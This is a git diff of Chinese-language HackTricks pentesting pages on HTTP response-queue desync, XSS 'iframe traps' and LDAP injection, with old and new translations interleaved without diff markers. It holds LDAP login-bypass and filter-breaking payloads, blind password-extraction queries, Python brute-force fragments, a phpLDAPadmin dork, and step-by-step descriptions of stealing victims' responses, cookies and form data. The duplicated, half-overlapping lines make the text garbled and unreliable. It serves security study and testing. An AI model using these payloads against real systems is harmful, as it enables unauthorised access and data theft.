学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的公司在 HackTricks 中被广告,或者下载 HackTricks 的 PDF 版本,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
**本文技术取自视频:** [**https://www.youtube.com/watch?v=suxDcYViwao\&t=1343s**](https://www.youtube.com/watch?v=suxDcYViwao\&t=1343s)
**本帖的技术来自视频:** [**https://www.youtube.com/watch?v=suxDcYViwao\&t=1343s**](https://www.youtube.com/watch?v=suxDcYViwao\&t=1343s)
## HTTP 请求队列
## HTTP 请求队列去同
首先,这种技术**滥用了 HTTP 请求串联漏洞**,因此您需要了解这是什么:
首先,这种技术**利用了 HTTP 请求走私漏洞**,所以你需要知道这是什么:
这种技术与常见的 HTTP 请求串联的**主要区别**在于,**不是通过向受害者的请求添加前缀来攻击**,而是**泄露或修改受害者接收到的响应**。这是通过**发送两个完整请求以异步代理响应队列**,而不是发送一个半请求来滥用 HTTP 请求串联来实现的
这种技术与常见的 HTTP 请求走私的**主要区别**在于,**不是通过添加前缀来攻击受害者的请求**,而是**泄露或修改受害者收到的响应**。这是通过发送**两个完整的请求来去同步代理的响应队列**,而不是发送一个半请求来利用 HTTP 请求走私
这是因为我们将能够**步响应队列**,使得**受害者的合法请求的响应被发送给攻击者**,或者通过**在响应中注入攻击者控制的内容**。
这是因为我们将能够**去同步响应队列**,使得**受害者的合法请求的响应被发送给攻击者**,或者通过**在响应中注入攻击者控制的内容**。
### HTTP 管道
### HTTP 管道去同
HTTP/1.1 允许**请求不需要等待之前的资源**。因此,如果**中间有代理**,则代理的任务是**维护与发送到后端的请求和来自后端的响应的同步匹配**。
HTTP/1.1 允许请求**不同的资源而不需要等待之前的请求**。因此,如果中间有一个**代理**,那么代理的任务是**保持发送到后端的请求和来自后端的响应的同步匹配**。
然而,存在一个问题,即异步响应队列。如果攻击者发送了一个 HTTP 响应串联攻击,并且对**初始请求和串联请求的响应立即响应**,则串联响应不会被插入到受害者响应队列中,而将**被丢弃为错误**。
然而,去同步响应队列存在一个问题。如果攻击者发送一个 HTTP 响应走私攻击,并且对**初始请求和走私请求的响应立即返回**,那么走私响应不会被插入到受害者响应的队列中,而是**作为错误被丢弃**。
因此,**需要串联请求花费更多时间在后端服务器中处理**。因此,当串联请求被处理时,与攻击者的通信将结束。
![](<../.gitbook/assets/image (633).png>)
在这种特定情况下,如果**受害者发送了一个请求**,而**串联请求在合法请求之前得到响应**,则**串联响应将发送给受害者**。因此,攻击者将**控制受害者“执行”的请求**
因此,需要**走私请求在后端服务器中处理的时间更长**。因此,当走私请求被处理时,与攻击者的通信将结束
此外,如果**攻击者然后执行一个请求**,而**受害者的合法响应**在**攻击者请求之前被回答**。则**受害者的响应将发送给攻击者****窃取**了受害者的响应(例如可能包含头部**Set-Cookie**)。
如果在这种特定情况下,**受害者发送了一个请求**,而**走私请求在合法请求之前被响应**,那么**走私响应将被发送给受害者**。因此,攻击者将**控制受害者“执行”的请求**。
此外,如果**攻击者随后执行一个请求**,而**对受害者请求的合法响应在攻击者请求之前被回答**,那么**对受害者的响应将被发送给攻击者****窃取**对受害者的响应(例如,可能包含**Set-Cookie**头)。
![](<../.gitbook/assets/image (1020).png>)
![](<../.gitbook/assets/image (719).png>)
### 多重嵌套注入
与常见的**HTTP 请求串联**的另一个**有趣的区别**是,在常见的串联攻击中,**目标**是**修改受害者请求的开头**,以执行意外操作。在**HTTP 响应串联攻击**中,由于**发送完整请求**,您可以**在一个有效负载中注入数十个响应**,这将**使数十个用户异步**,这些用户将**接收**到**注入的响应**。
与常见的**HTTP 请求走私**相比,另一个**有趣的区别**是,在常见的走私攻击中,**目标**是**修改受害者请求的开头**,以便执行意外的操作。在**HTTP 响应走私攻击**中,由于你**发送完整的请求**,你可以**在一个有效载荷中注入数十个响应**,这将**去同步数十个用户**,这些用户将**接收**被**注入的**响应
除了更容易地**分发数十个漏洞**给合法用户外,这也可以用于在服务器上引起**拒绝服务**。
除了能够**更容易地在合法用户之间分发数十个漏洞**,这也可以用来导致服务器的**拒绝服务**。
### 攻击组织
### 漏洞组织
如前所述,为了滥用这种技术,**需要第一个串联消息**进入服务器**需要花费很长时间来处理**。
如前所述,为了利用这种技术,需要**第一个走私消息**在服务器中**处理的时间很长**。
如果我们只想**尝试窃取受害者的响应**,则这**耗时请求足够**。但如果要执行更复杂的攻击,则这将是攻击的常见结构。
如果我们只是想**尝试窃取受害者的响应**,那么这个**耗时的请求就足够了**。但如果你想执行更复杂的漏洞,这将是漏洞的常见结构。
首先是**滥用 HTTP 请求串联**的**初始**请求,然后是**耗时请求**,然后是**1个或多个有效负载请求**,其响应将发送给受害者。
首先是**初始**请求,利用**HTTP** **请求** **走私**,然后是**耗时的请求**,最后是**一个或多个有效载荷请求**,其响应将被发送给受害者。
## 滥用 HTTP 响应队列异
## 利用 HTTP 响应队列去同
### 捕获其他用户的请求 <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
与已知的 HTTP 请求串联有效载荷一样,您可以通过一个重要的区别**窃取受害者的请求**:在这种情况下,您只需要**发送内容反映在响应中****不需要持久存储**。
与已知的 HTTP 请求走私有效载荷一样,你可以**窃取受害者的请求**,有一个重要的区别:在这种情况下,你只需要**发送的内容在响应中被反射****不需要持久存储**。
首先,攻击者发送一个包含**最终 POST 请求和反映参数**的有效负载,以及一个大的 Content-Length
首先,攻击者发送一个有效载荷,包含一个**带有反射参数的最终 POST 请求**,并且有一个大的 Content-Length。
然后,一旦**初始请求**(蓝色)被**处理****同时**正在处理**耗时**请求(黄色),**来自受害者的下一个请求**将被**附加到反映参数后的队列中**
![](<../.gitbook/assets/image (1053).png>)
然后,**受害者**将**接收**到**耗时**请求的**响应**,如果**同时** **攻击者发送了另一个请求**,则**反映内容请求的响应将发送给他**。
然后,一旦**初始请求**(蓝色)被**处理**,而**耗时**的请求(黄色)正在被处理时,**来自受害者的下一个请求**将被**附加在反射参数之后**
## 响应异步
![](<../.gitbook/assets/image (794).png>)
到目前为止,我们已经学会了如何滥用 HTTP 请求串联攻击来**控制**客户端将**接收**的**响应的请求**,以及如何**窃取本应发送给受害者的响应**。
然后,**受害者**将**收到**对**耗时**请求的**响应**,如果在此期间**攻击者****发送**了**另一个**请求,**反射内容请求的响应将被发送给他**。
但仍然可以**进一步异步**响应。
## 响应去同步
有一些有趣的请求,如**HEAD**请求,规定**响应体内不得包含任何内容**,并且应(必须)**包含请求的 Content-Length**,就像**GET 请求**一样。
到目前为止,我们已经学习了如何利用 HTTP 请求走私攻击来**控制**客户端将要**接收的响应**,以及如何**窃取原本属于受害者的响应**。
但仍然可以**进一步去同步**响应。
有趣的请求如**HEAD**请求被指定为不应在响应体内**包含任何内容**,并且应(必须)**包含请求的 Content-Length**,就像**GET 请求**一样。
因此,如果攻击者**注入**一个**HEAD**请求,如下图所示:
然后,**一旦蓝色请求被响应给攻击者**,下一个受害者请求将被引入队列:
![](<../.gitbook/assets/image (1107).png>)
然后,一旦**蓝色请求**被响应给攻击者,下一位受害者的请求将被引入队列:
![](<../.gitbook/assets/image (999).png>)
然后,**受害者**将**收到**来自**HEAD**请求的**响应**,该响应**将包含一个 Content-Length但没有任何内容**。因此,代理**不会将此响应发送给受害者,而是**等待**一些**内容**,实际上将是**对黄色请求的响应**(也由攻击者注入):
![](<../.gitbook/assets/image (735).png>)
然后,**受害者**将**接收**到**HEAD**请求的**响应**,其中**将包含 Content-Length 但没有任何内容**。因此,代理**不会将此响应发送**给受害者,而是**等待**一些**内容**,实际上将是**对黄色请求的响应**(同样是攻击者注入的):
### 内容混淆
根据先前的示例,知道你可以**控制**将要接收受害者的响应的请求的**主体**,而**HEAD** **响应**通常在其标头中包含**Content-Type和Content-Length**你可以发送以下请求来在受害者中引发XSS而页面本身并不容易受到XSS攻击
根据前面的例子,知道你可以**控制请求的主体**,而该请求的响应将被受害者接收,并且**HEAD** **响应**通常在其头部包含**Content-Type 和 Content-Length**,你可以**发送如下请求**以**在受害者中引发 XSS**,而页面并不容易受到 XSS 攻击:
![](<../.gitbook/assets/image (688).png>)
### 缓存毒
### 缓存
滥用先前评论的响应解同步内容混淆攻击,**如果缓存存储了受害者执行的请求的响应并且这个响应是一个注入的响应导致XSS,那么缓存就被毒化了**。
利用之前提到的响应去同步内容混淆攻击,**如果缓存存储了受害者执行的请求的响应,并且该响应是一个导致 XSS 的注入响应,那么缓存就被毒化了**。
包含XSS有效载荷的恶意请求
包含 XSS 有效载荷的恶意请求:
![](<../.gitbook/assets/image (614).png>)
发送给受害者的恶意响应,其中包含指示缓存存储响应的头:
包含指示缓存存储响应的头的恶意响应
![](<../.gitbook/assets/image (566).png>)
{% hint style="warning" %}
请注意,在这种情况下,如果**"受害者"是攻击者**,他现在可以在**任意URL中执行缓存毒化**,因为他可以**控制将被缓存的URL**与恶意响应一起
请注意,在这种情况下,如果**“受害者”是攻击者**,他现在可以在任意 URL 上执行**缓存中毒**,因为他可以**控制将被缓存的 URL**与恶意响应
{% endhint %}
### Web缓存欺骗
### Web 缓存欺骗
这种攻击类似于先前的攻击,但**攻击者不是在缓存中注入有效载荷,而是将受害者信息缓存在缓存中**
此攻击类似于前一个,但**攻击者将受害者信息缓存到缓存中,而不是在缓存中注入有效载荷:**
![](<../.gitbook/assets/image (991).png>)
### 响应
### 响应分
这种攻击的**目标**是再次滥用**响应** **解同步**,以便**使代理发送100%由攻击者生成的响应**。
此攻击的**目标**是再次利用**响应** **去同步**,以便**使代理发送 100% 由攻击者生成的响应**。
为了实现这一点,攻击者需要找到Web应用程序的一个端点该端点**在响应中反映一些值**,并且**了解HEAD响应的内容长度**。
为了实现这一点,攻击者需要找到一个**反射某些值到响应中的** Web 应用程序端点,并**知道 HEAD 响应的内容长度**。
他将发送一个**利用**,如下所示:
他将发送一个**漏洞**,如下所示:
![](<../.gitbook/assets/image (911).png>)
在第一个请求被解决并发送回攻击者后,**受害者的请求被添加到队列中**
在第一个请求被解决并发送回攻击者后,**受害者的请求被添加到队列中**
![](<../.gitbook/assets/image (737).png>)
受害者将作为响应接收**HEAD响应 + 第二个请求响应的内容(包含反映数据的部分)**
受害者将收到的响应是**HEAD 响应 + 第二个请求响应的内容(包含部分反射数据):**
![](<../.gitbook/assets/image (356).png>)
然而,请注意**反映数据的大小符合HEAD响应的Content-Length**,这**在响应队列中生成了一个有效的HTTP响应**。
然而,请注意**反射数据的大小与 HEAD** 响应的 **Content-Length** 相符,这**在响应队列中生成了有效的 HTTP 响应**。
因此,**第二个受害者的下一个请求**将**接收**到**完全由攻击者制作的响应**。由于响应完全由攻击者制作,他还可以**使代理缓存响应**。
因此,**第二位受害者的下一个请求**将**接收**作为**响应完全由攻击者构造的内容**。由于响应完全由攻击者构造,他还可以**使代理缓存该响应**。
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,47 +1,49 @@
# Iframe 陷阱
# Iframe Traps
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的公司在 HackTricks 中被广告,或者**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 基本信息
通过滥用 XSS 通过 iframe 窃取用户在网页上移动时的信息,最初是在 trustedsec.com 的这两篇文章中发布的[**这里**](https://trustedsec.com/blog/persisting-xss-with-iframe-traps) **和** [**这里**](https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams)。
这种通过 iframe 滥用 XSS 来窃取用户在网页上移动时的信息的形式最初在 trustedsec.com 的这两篇文章中发布[**这里**](https://trustedsec.com/blog/persisting-xss-with-iframe-traps) **和** [**这里**](https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams)。
攻击始于一个易受 XSS 攻击的页面,可以通过让**受害者不离开 XSS**,使他们在**iframe 中导航**,占据整个 Web 应用程序
攻击开始于一个易受 XSS 攻击的页面,在这里可以让 **受害者不离开 XSS**,通过让他们 **在一个占据整个网页应用的 iframe 中导航**
XSS 攻击基本上会在 iframe 中将网页加载到整个屏幕的 100% 中。因此,受害者**不会注意到他在 iframe 中**。然后,如果受害者通过在 iframe 中点击链接(在网页内)来导航页面,他将**在 iframe 中导航**,加载的任意 JS 将窃取此导航中的信息。
XSS 攻击基本上会在 100% 的屏幕中加载网页到一个 iframe 中。因此,受害者 **不会注意到他在一个 iframe 中**。然后,如果受害者通过点击 iframe 内部的链接(在网页内)进行页面导航,他将 **在 iframe 内部导航**,使用加载的任意 JS 窃取此导航中的信息。
此外,为了使其更加逼真,可以使用一些**监听器**来检查 iframe 何时更改页面的位置,并使用用户认为自己在使用浏览器移动页面的位置更新浏览器的 URL。
此外,为了使其更真,可以使用一些 **监听器** 来检查 iframe 何时更改页面的位置,并用用户认为他正在使用浏览器移动页面的那些位置更新浏览器的 URL。
<figure><img src="../.gitbook/assets/image (1248).png" alt=""><figcaption><p><a href="https://www.trustedsec.com/wp-content/uploads/2022/04/regEvents.png">https://www.trustedsec.com/wp-content/uploads/2022/04/regEvents.png</a></p></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1249).png" alt=""><figcaption><p><a href="https://www.trustedsec.com/wp-content/uploads/2022/04/fakeAddress-1.png">https://www.trustedsec.com/wp-content/uploads/2022/04/fakeAddress-1.png</a></p></figcaption></figure>
此外,可以使用监听器窃取敏感信息,不仅包括受害者正在访问的其他页面,还包括用于**填写表单**并发送它们(凭据?)或**窃取本地存储**的数据...
此外,可以使用监听器来窃取敏感信息,不仅是受害者正在访问的其他页面,还有用于 **填写表单** 的数据并发送它们(凭据?)或 **窃取本地存储**...
当然,主要的限制是**受害者关闭选项卡或在浏览器中输入另一个 URL 将会逃离 iframe**。另一种方法是**刷新页面**,但是,这可能会被部分地**通过在每次在 iframe 中加载新页面时禁用右键单击上下文菜单**或注意到用户的鼠标离开 iframe 时,潜在地点击浏览器的重新加载按钮来防止,此时浏览器的 URL 将被更新为易受 XSS 攻击的原始 URL因此如果用户重新加载它它将再次被感染请注意这并不是非常隐蔽的方法
当然,主要的限制是 **受害者关闭标签页或在浏览器中输入另一个 URL 将逃离 iframe**。另一种方法是 **刷新页面**,然而,这可能会通过在每次新页面加载到 iframe 内部时禁用右键上下文菜单或注意用户的鼠标何时离开 iframe 来部分 **防止**,可能是为了点击浏览器的重新加载按钮,在这种情况下,浏览器的 URL 会更新为原始的易受 XSS 攻击的 URL因此如果用户重新加载它将再次被污染请注意这并不是非常隐蔽
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的公司在 HackTricks 中被广告,或者**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,80 +1,81 @@
# LDAP注入
# LDAP 注入
## LDAP注入
## LDAP 注入
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要黑入不可黑入的系统 - **我们正在招聘!**(需要流利的波兰语书面和口头表达能力)。
如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
## LDAP注入
## LDAP 注入
### **LDAP**
**如果您想了解什么是LDAP请访问以下页面**
**如果你想知道什么是 LDAP请访问以下页面**
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}
**LDAP注入**是一种针对从用户输入构造LDAP语句的Web应用程序的攻击。当应用程序**未能正确对输入进行清理**时,攻击者可以通过本地代理**操纵LDAP语句**可能导致未经授权的访问或数据操纵。
**LDAP 注入** 是一种针对从用户输入构建 LDAP 语句的 Web 应用程序的攻击。当应用程序 **未能正确清理** 输入时,攻击者可以通过本地代理 **操纵 LDAP 语句**,这可能导致未经授权的访问或数据操纵。
{% file src="../.gitbook/assets/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
**过滤器** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = 绝对TRUE\
**(|)** = 绝对FALSE
**过滤组件** = and / or / not / item\
**** = & filterlist\
**** = |filterlist\
**** = ! filter\
**过滤列表** = 1\*filter\
**项目**= simple / present / substring\
**简单** = attr filtertype assertionvalue\
**过滤类型** = _'=' / '\~=' / '>=' / '<='_\
**存在** = attr = \*\
**子字符串** = attr ”=” \[initial] \* \[final]\
**初始** = assertionvalue\
**最终** = assertionvalue\
**(&)** = 绝对\
**(|)** = 绝对
例如:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`
您可以访问数据库,其中可能包含各种不同类型的信息。
你可以访问数据库,这可能包含多种不同类型的信息。
**OpenLDAP**:如果有2个过滤器到达,只执行第一个。\
**ADAM或Microsoft LDS**有2个过滤器时会抛出错误。\
**SunOne Directory Server 5.0**:执行两个过滤器。
**OpenLDAP**:如果到达 2 个过滤器,只执行第一个。\
**ADAM Microsoft LDS**:有 2 个过滤器时会抛出错误。\
**SunOne 目录服务器 5.0**:执行两个过滤器。
**非常重要的是发送具有正确语法的过滤器否则将抛出错误。最好只发送1个过滤器。**
**发送过滤器时使用正确的语法非常重要,否则会抛出错误。最好只发送 1 个过滤器。**
过滤器必须以`&`或`|`开头\
示例:`(&(directory=val1)(folder=public))`
过滤器必须以 `&``|` 开头。\
示例: `(&(directory=val1)(folder=public))`
`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
然后:`(&(objectClass=`**`*)(ObjectClass=*))`**将是第一个过滤器(执行的过滤器)。
然后: `(&(objectClass=`**`*)(ObjectClass=*))`** 将是第一个过滤器(被执行的那个)。
### 登录绕过
LDAP支持多种格式存储密码明文、md5、smd5、sh1、sha、crypt。因此无论您在密码中插入什么,它都可能被哈希处理。
LDAP 支持多种格式存储密码明文、md5、smd5、sh1、sha、crypt。因此可能无论你在密码中插入什么,它都会被哈希处理。
```bash
user=*
password=*
@ -135,9 +136,9 @@ password=any
* [LDAP 属性](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [LDAP PosixAccount 属性](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)
### LDAP 注入
### 隐蔽 LDAP 注入
您可以强制 False 或 True 响应以检查是否返回任何数据,并确认可能存在盲 LDAP 注入:
您可以强制返回 False 或 True 响应,以检查是否返回任何数据并确认可能的隐蔽 LDAP 注入:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
@ -149,9 +150,9 @@ Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### 转储数据
#### Dump data
您可以迭代ASCII字母、数字和符号:
您可以遍历 ASCII 字母、数字和符号:
```bash
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
@ -162,11 +163,11 @@ Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=P
(&(sn=administrator)(password=MB*)) : KO
...
```
### 脚本
### Scripts
#### **发现有效的LDAP字段**
LDAP对象**默认包含多个属性**,可用于**保存信息**。您可以尝试**暴力破解所有这些属性以提取信息**。您可以在[**此处找到默认LDAP属性列表**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)。
LDAP对象**默认包含多个属性**,可以用来**保存信息**。你可以尝试**暴力破解所有这些属性以提取该信息。** 你可以在[**这里找到默认的LDAP属性列表**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)。
```python
#!/usr/bin/python3
import requests
@ -198,7 +199,7 @@ if char == alphabet[-1]: #If last of all the chars, then, no more chars in the v
finish = True
print()
```
#### **特殊盲LDAP注入无"\*"**
#### **特殊盲LDAP注入不带“\*”**
```python
#!/usr/bin/python3
@ -215,7 +216,7 @@ flag += char
print("[+] Flag: " + flag)
break
```
### 谷歌黑客搜索技巧
### Google Dorks
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
@ -223,22 +224,23 @@ intitle:"phpLDAPadmin" inurl:cmd.php
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要黑入不可黑入的系统 - **我们正在招聘!**(需要流利的波兰语书面和口语表达能力)。
